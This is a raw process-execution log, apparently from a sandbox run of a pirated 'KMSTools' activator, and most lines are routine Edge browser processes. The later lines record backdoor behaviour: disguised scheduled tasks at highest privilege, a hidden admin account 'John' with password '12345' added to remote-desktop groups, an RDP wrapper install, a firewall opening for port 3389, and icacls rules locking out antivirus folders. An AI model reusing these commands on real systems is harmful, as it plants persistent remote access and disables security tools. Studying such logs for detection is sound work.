C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5812 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5956,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5900 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5224,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5168,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=4812,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5880,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6724 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6736,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6584,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6800 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5964,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6316,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6052,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5948 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6416,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6164 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4836,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3280,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5004,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5384,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3988 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6816,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2892 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5828,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3568,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5468 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3416,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5324 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5468,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6160 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe
"C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5560,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3288 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe
"C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\PerfLogs\KMSTools.zip"
C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe
"C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6840,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:8
C:\KMS Tools Lite Portable\KMSTools Lite.exe
"C:\KMS Tools Lite Portable\KMSTools Lite.exe"
C:\KMS Tools Lite Portable\GSetup.exe
"C:\KMS Tools Lite Portable\GSetup.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSTools "C:\Users\Admin\AppData\Local\Temp\KMSTools.tmp" /Y
C:\ProgramData\Setup\install.exe
C:\ProgramData\Setup\install.exe -palexpassword
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x510 0x514
C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe
"C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\KMS Tools Lite Portable\Programs" "W10 Digital Activation Program"*
C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe
"C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe"
C:\ProgramData\Setup\KMS.exe
"C:\ProgramData\Setup\KMS.exe"
C:\ProgramData\Setup\update.exe
"C:\ProgramData\Setup\update.exe"
C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe
"C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\KMS Tools Lite Portable\Programs" "Office Installer+"*
C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe
"C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\SystemManager" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\ManagerService" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\GlobalData" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\KMS Tools Lite Portable\Programs\Office Installer+\readme.txt
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=3376,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=5368,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:1
C:\ProgramData\Microsoft\win.exe
C:\ProgramData\Microsoft\win.exe -ppidar
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x28c,0x7ff847c7f208,0x7ff847c7f214,0x7ff847c7f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1852,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=2644 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2608,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2296,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=3224 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4228,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4376,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4696,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4756 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4776 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=4728,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\Windows\system32\sc.exe
sc start appidsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\winlogon.bat
C:\Windows\system32\sc.exe
sc config appidsvc start= auto
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\WindowsTask\new.xml"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\SysFilesQ\RecoveryHosts" /TR "C:\ProgramData\Microsoft\DRM\Vb0NjPwXy\SysFilesQ.bat" /SC ONLOGON /RL HIGHEST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\ProgramData\Setup\svchost.exe
C:\ProgramData\Setup\svchost.exe -ppidar
C:\ProgramData\Setup\IP.exe
"C:\ProgramData\Setup\IP.exe"
C:\ProgramData\Setup\smss.exe
"C:\ProgramData\Setup\smss.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe"
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" -second
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user John 12345 /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
C:\Windows\system32\net.exe
net user John 12345 /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user John 12345 /add
C:\Windows\system32\net.exe
net localgroup "Администраторы" John /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" John /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\system32\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
C:\Windows\system32\net.exe
net localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
C:\Windows\system32\net.exe
net localgroup "Administrators" John /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
C:\Windows\system32\net.exe
net localgroup "Administradores" John /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
C:\Windows\system32\net.exe
net localgroup "Remote Desktop Users" john /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
C:\Windows\SysWOW64\unsecapp.exe
C:\Windows\SysWOW64\unsecapp.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat
C:\ProgramData\RDPWinst.exe
C:\ProgramData\RDPWinst.exe -i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5704,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5800 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5748,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5776,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:8
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
